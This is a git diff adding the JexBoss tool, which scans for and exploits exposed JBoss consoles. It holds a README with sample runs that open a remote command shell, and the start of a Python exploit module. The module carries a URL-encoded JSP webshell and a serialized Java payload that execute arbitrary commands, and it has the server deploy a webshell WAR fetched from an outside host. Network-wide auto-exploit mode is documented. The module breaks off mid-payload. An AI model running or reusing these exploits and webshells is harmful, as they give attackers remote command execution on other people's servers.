diff --git a/Jboss_Verify_EXploitation/.gitignore b/Jboss_Verify_EXploitation/.gitignore new file mode 100644 index 0000000..68a851b --- /dev/null +++ b/Jboss_Verify_EXploitation/.gitignore @@ -0,0 +1,60 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] + +# C extensions +*.so + +# Distribution / packaging +.Python +env/ +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.cache +nosetests.xml +coverage.xml + +# Translations +*.mo +*.pot + +# Django stuff: +*.log + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# PyCharm project files +.idea/ + +# I/O files +*.csv diff --git a/Jboss_Verify_EXploitation/README.md b/Jboss_Verify_EXploitation/README.md new file mode 100644 index 0000000..9228652 --- /dev/null +++ b/Jboss_Verify_EXploitation/README.md @@ -0,0 +1,250 @@ +JexBoss - Jboss verify and EXploitation Tool +======= + +JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. + +Requirements +---- +* Python >= 2.7.x +* [urllib3](https://pypi.python.org/pypi/urllib3) +* [ipaddress](https://pypi.python.org/pypi/ipaddress) + +Installation +---- +To install the latest version of JexBoss, please use the following commands: + + git clone https://github.com/joaomatosf/jexboss.git + cd jexboss + pip install -r requires.txt + python jexboss.py -h + + OR: + + Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip + unzip master.zip + cd jexboss-master + pip install -r requires.txt + python jexboss.py -h + + +If you are using CentOS with Python 2.6, please install Python2.7. +Installation example of the Python 2.7 on CentOS using Collections Software scl: + + yum -y install centos-release-scl + yum -y install python27 + scl enable python27 bash + + +Features +---- +The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server. + +The exploitation vectors are: + +* /admin-console [ NEW ] + - tested and working in JBoss versions 5 and 6 +* /jmx-console + - tested and working in JBoss versions 4, 5 and 6 +* /web-console/Invoker + - tested and working in JBoss versions 4 +* /invoker/JMXInvokerServlet + - tested and working in JBoss versions 4 and 5 + +Screenshots +---- + +* Standalone mode: +``` +$ python jexboss.py -host 192.168.0.114:8080 +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode.png) + +* Usage modes: +``` +$ python jexboss.py -h +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/help_usage.png) + +* Network scan mode: +``` +$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/network_scan_mode.png) + +* Network scan with auto-exploit mode: +``` +$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt +``` +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/scan_with_auto_exploit_mode.png) + + +* Results and recommendations: + +![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/results_and_recommendations.png) + +Usage example +---- +* Check the file "demo.png" + +* Auto scan mode: +``` +$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log +``` + +* File scan mode: +``` +$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log +``` + +* More Options: + +``` +$ python jexboss.py -h + +optional arguments: + -h, --help show this help message and exit + --version show program's version number and exit + --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE + PERMISSION!!!) + --disable-check-updates, -D + Disable the check for updates performed by JSP + Webshell at: + http://webshell.jexboss.net/jsp_version.txt + -mode {auto-scan,file-scan,standalone} + Operation mode + +Standalone mode: + -host HOST Host address to be checked (eg. + http://192.168.0.10:8080) + +Auto scan mode: + -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) + -ports PORTS List of ports separated by commas to be checked for + each host (eg. 8080,8443,8888,80,443) + -results FILENAME File name to store the auto scan results + +File scan mode: + -file FILENAME_HOSTS Filename with host list to be scanned (one host per + line) + -out FILENAME_RESULTS + File name to store the file scan results + +``` + +* Standalone mode: + +``` +* Via git: + +$ git clone https://github.com/joaomatosf/jexboss.git +$ cd jexboss +$ python jexboss.py -host https://site-teste.com + +* Or via download: + +$ wget https://github.com/joaomatosf/jexboss/archive/master.zip +$ unzip master.zip +$ cd jexboss-master +$ python jexboss.py -host https://site-teste.com + + + * --- JexBoss: Jboss verify and EXploitation Tool --- * + | | + | @author: João Filho Matos Figueiredo | + | @contact: joaomatosf@gmail.com | + | | + | @update: https://github.com/joaomatosf/jexboss | + #______________________________________________________# + + + ** Checking Host: https://site-teste.com ** + + * Checking admin-console: [ EXPOSED ] + * Checking web-console: [ OK ] + * Checking jmx-console: [ VULNERABLE ] + * Checking JMXInvokerServlet: [ VULNERABLE ] + + + * Do you want to try to run an automated exploitation via "jmx-console" ? + This operation will provide a simple command shell to execute commands on the server.. + Continue only if you have permission! + yes/NO ? yes + + * Sending exploit code to https://site-teste.com. Wait... + + + * Info: This exploit will force the server to deploy the webshell + available on: http://www.joaomatosf.com/rnp/jbossass.war + * Successfully deployed code! Starting command shell, wait... + + * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * + + * https://site-teste.com: + + Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux + + CentOS release 6.5 (Final) + + uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0 + +[Type commands or "exit" to finish] +Shell> pwd +/usr/jboss-6.1.0.Final/bin + +[Type commands or "exit" to finish] +Shell> hostname +fwgw + +[Type commands or "exit" to finish] +Shell> ls -all /home +total 16 +drwxr-xr-x. 4 root root 4096 Jan 26 2015 . +dr-xr-xr-x. 23 root root 4096 Mar 31 04:51 .. +-rwxrwxrwx. 1 root root 0 Jan 26 2015 file1 +-rw-r-----. 1 root root 0 Jan 26 2015 file2 +-rw-rw-r--. 1 root root 0 Jan 26 2015 file3 +drwx------. 2 joao joao 4096 Jan 26 2015 joao +drwx------. 2 maria maria 4096 Jan 26 2015 maria + +[Type commands or "exit" to finish] +Shell>exit + +Results: potentially compromised server! + * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -* + Recommendations: + - Remove web consoles and services that are not used, eg: + $ rm web-console.war + $ rm http-invoker.sar + $ rm jmx-console.war + $ rm jmx-invoker-adaptor-server.sar + $ rm admin-console.war + - Use a reverse proxy (eg. nginx, apache, F5) + - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY) + - Search vestiges of exploitation within the directories "deploy" and "management". + + References: + [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole + [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf + + - If possible, discard this server! + * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -* + + * Info: review, suggestions, updates, etc: + https://github.com/joaomatosf/jexboss + + * DONATE: Please consider making a donation to help improve this tool, + including research to new versions of JBoss and zero days. + + * Paypal: joaomatosf@gmail.com + * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C + * URI: bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss +``` + + + +Questions, problems, suggestions and etc: +---- + +* joaomatosf@gmail.com + + diff --git a/Jboss_Verify_EXploitation/_exploits.py b/Jboss_Verify_EXploitation/_exploits.py new file mode 100644 index 0000000..6d30bd7 --- /dev/null +++ b/Jboss_Verify_EXploitation/_exploits.py @@ -0,0 +1,555 @@ +# -*- coding: utf-8 -*- +""" +Module to group exploits of the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +from jexboss import * +from random import randint +import urllib +from sys import version_info +if version_info[0] >= 3: + from urllib.parse import quote + + +def exploit_jmx_console_main_deploy(url): + """ + Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5). + /jmx-console/HtmlAdaptor + :param url: The url to exploit + :return: The HTTP status code + """ + if not 'http' in url[:4]: + url = "http://"+url + + jsp = "http://www.joaomatosf.com/rnp/jexws3.war" + payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=" + "MainDeployer&methodIndex=19&arg0="+jsp) + print(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " + + "\n available at: " + jsp + ENDC) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def exploit_jmx_console_file_repository(url): + """ + Exploit DeploymentFileRepository to deploy a JSP shell + Tested and working in JBoss 4, 5. Does not work in JBoss 6. + /jmx-console/HtmlAdaptor + :param url: The URL to exploit + :return: The HTTP status code + """ + jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A" + "%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45" + "%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E" + "%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" + "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20" + "%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C" + "%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D" + "%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75" + "%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22" + "%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48" + "%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C" + "%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B" + "%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20" + "%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B" + "%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65" + "%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F" + "%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A" + "%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E" + "%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68" + "%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22" + "%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65" + "%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22" + "%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C" + "%20%22%2D%22%29%3B%20%74%72%79%7B%20%69%66%20%28%63%68%65%63%6B%55%70%64%61%74%65%73%20" + "%3D%3D%20%74%72%75%65%29%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%73%65" + "%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22" + "%2C%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22" + "%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B" + "%20%69%66%20%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48" + "%6F%75%72%43%68%65%63%6B%29%2E%65%78%69%73%74%73%28%29%29%7B%20%50%72%69%6E%74%57%72%69" + "%74%65%72%20%77%72%69%74%65%72%20%3D%20%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28" + "%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%29%3B%20%77%72%69%74" + "%65%72%2E%63%6C%6F%73%65%28%29%3B%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64" + "%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28" + "%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65" + "%61%6D%28%29%29%29%3B%20%69%6E%74%20%6C%61%73%74%56%65%72%73%69%6F%6E%20%3D%20%49%6E%74" + "%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73" + "%70%6C%69%74%28%22%20%22%29%5B%31%5D%29%3B%20%69%66%20%28%6C%61%73%74%56%65%72%73%69%6F" + "%6E%20%3E%20%76%65%72%73%69%6F%6E%29%7B%20%6F%75%74%2E%70%72%69%6E%74%28%22%50%6C%65%61" + "%73%65%20%6E%6F%74%65%3A%20%74%68%65%72%65%20%69%73%20%61%6E%20%75%70%64%61%74%65%20%74" + "%6F%20%4A%65%78%42%6F%73%73%20%4A%53%50%20%57%65%62%73%68%65%6C%6C%2E%20%57%65%20%72%65" + "%63%6F%6D%6D%65%6E%64%20%74%68%61%74%20%79%6F%75%20%72%65%72%75%6E%20%74%68%65%20%4A%65" + "%78%42%6F%73%73%20%74%6F%20%72%65%64%65%70%6C%6F%79%20%74%68%65%20%6E%65%77%20%76%65%72" + "%73%69%6F%6E%20%6F%66%20%77%65%62%73%68%65%6C%6C%20%69%6E%20%4A%42%6F%73%73%20%73%65%72" + "%76%65%72%20%74%65%73%74%65%64%2E%22%29%3B%20%7D%20%7D%20%65%6C%73%65%20%69%66%20%28%73" + "%68%2E%63%6F%6E%74%61%69%6E%73%28%22%69%64%22%29%20%7C%7C%20%73%68%2E%63%6F%6E%74%61%69" + "%6E%73%28%22%69%70%63%6F%6E%66%69%67%22%29%29%20%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70" + "%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%20%7D%20%7D%20%7D" + "%20%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74" + "%6C%6E%28%22%45%72%72%6F%72%20%63%68%65%63%6B%69%6E%67%20%66%6F%72%20%75%70%64%61%74%65" + "%73%22%29%3B%7D%20%74%72%79%20%7B%20%50%72%6F%63%65%73%73%20%70%3B%20%69%66%20%28%53%79" + "%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%6F%73%2E%6E%61%6D%65%22%29%2E%74" + "%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3E" + "%20%30%20%7C%7C%20%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69" + "%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%20" + "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63" + "%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%20%7D%20%65%6C%73%65%20%7B%20" + "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63" + "%28%73%68%29%3B%20%7D%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64" + "%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65" + "%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72" + "%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%64%69%73%72" + "%20%21%3D%20%6E%75%6C%6C%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29" + "%3B%20%64%69%73%72%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%63%61" + "%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C" + "%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%2E%22%29%3B%20%7D%20%7D%20%25%3E") + + payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" + "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + "jexws3.war&argType=java.lang.String&arg1=jexws3&argType=java.lang.St" + "ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True") + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def exploit_jmx_invoker_file_repository(url, version): + """ + Exploits the JMX invoker + tested and works in JBoss 4, 5 + MainDeploy, shell in data + # /invoker/JMXInvokerServlet + :param url: The URL to exploit + :return: + """ + + payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e" + "\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c" + "\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4" + "\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72" + "\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72" + "\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65" + "\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65" + "\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70") + payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a") + payload += ( + "\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61" + "\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75" + "\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00" + "\x00\x00\x08\xb4\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e" + "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29" + "\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78" + "\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e" + "\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c" + "\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65" + "\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f" + "\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e" + "\x00\x00\x00\x00\x00\x05\x74\x00\x0b\x6a\x65\x78\x69\x6e\x76\x33\x2e\x77\x61" + "\x72\x74\x00\x07\x6a\x65\x78\x69\x6e\x76\x33\x74\x00\x04\x2e\x6a\x73\x70\x74" + "\x07\x79\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22" + "\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f" + "\x2e\x2a\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67" + "\x65\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e" + "\x20\x3c\x70\x72\x65\x3e\x20\x3c\x25\x20\x69\x6e\x74\x20\x76\x65\x72\x73\x69" + "\x6f\x6e\x20\x3d\x20\x33\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74" + "\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22" + "\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x62\x6f\x6f\x6c\x65\x61" + "\x6e\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x3b\x20\x48\x74\x74" + "\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x63\x6f\x6e\x6e" + "\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x6e\x75\x6c\x6c" + "\x3b\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x62\x72" + "\x20\x3d\x20\x6e\x75\x6c\x6c\x3b\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73" + "\x65\x74\x43\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x28\x22\x74\x65\x78\x74" + "\x2f\x68\x74\x6d\x6c\x22\x29\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73" + "\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x2d" + "\x75\x70\x64\x61\x74\x65\x73\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20\x26" + "\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72" + "\x28\x22\x63\x68\x65\x63\x6b\x2d\x75\x70\x64\x61\x74\x65\x73\x22\x29\x2e\x65" + "\x71\x75\x61\x6c\x73\x28\x22\x66\x61\x6c\x73\x65\x22\x29\x29\x7b\x20\x63\x68" + "\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x66\x61\x6c\x73\x65\x3b" + "\x20\x7d\x65\x6c\x73\x65\x20\x7b\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74" + "\x65\x73\x20\x3d\x20\x74\x72\x75\x65\x3b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63" + "\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c" + "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x6e\x65\x77\x20\x55\x52\x4c" + "\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73\x68\x65\x6c\x6c\x2e\x6a" + "\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x6a\x73\x70\x5f\x76\x65\x72\x73" + "\x69\x6f\x6e\x2e\x74\x78\x74\x22\x29\x2e\x6f\x70\x65\x6e\x43\x6f\x6e\x6e\x65" + "\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x7d\x20\x53\x74\x72\x69\x6e\x67\x20\x73" + "\x68\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61" + "\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x3b\x20\x53\x74\x72\x69\x6e" + "\x67\x20\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x20\x3d\x20\x28" + "\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67" + "\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22\x68" + "\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28\x22" + "\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x74\x72\x79\x7b\x20\x69\x66\x20\x28" + "\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x3d\x20\x74\x72\x75" + "\x65\x29\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65" + "\x73\x2e\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74" + "\x79\x28\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71" + "\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73" + "\x74\x22\x29\x2b\x22\x3c\x2d\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65" + "\x74\x52\x65\x6d\x6f\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20" + "\x28\x21\x6e\x65\x77\x20\x46\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x7a\x00" + "\x00\x04\x00\x5f\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b" + "\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7b\x20\x50\x72\x69\x6e\x74\x57" + "\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74\x65\x72\x20\x3d\x20\x6e\x65\x77\x20" + "\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x5f" + "\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x29\x3b\x20\x77" + "\x72\x69\x74\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x62\x72\x20\x3d" + "\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72" + "\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61" + "\x64\x65\x72\x28\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65" + "\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29" + "\x29\x3b\x20\x69\x6e\x74\x20\x6c\x61\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x20" + "\x3d\x20\x49\x6e\x74\x65\x67\x65\x72\x2e\x70\x61\x72\x73\x65\x49\x6e\x74\x28" + "\x62\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x2e\x73\x70\x6c\x69\x74" + "\x28\x22\x20\x22\x29\x5b\x31\x5d\x29\x3b\x20\x69\x66\x20\x28\x6c\x61\x73\x74" + "\x56\x65\x72\x73\x69\x6f\x6e\x20\x3e\x20\x76\x65\x72\x73\x69\x6f\x6e\x29\x7b" + "\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x28\x22\x50\x6c\x65\x61\x73\x65\x20" + 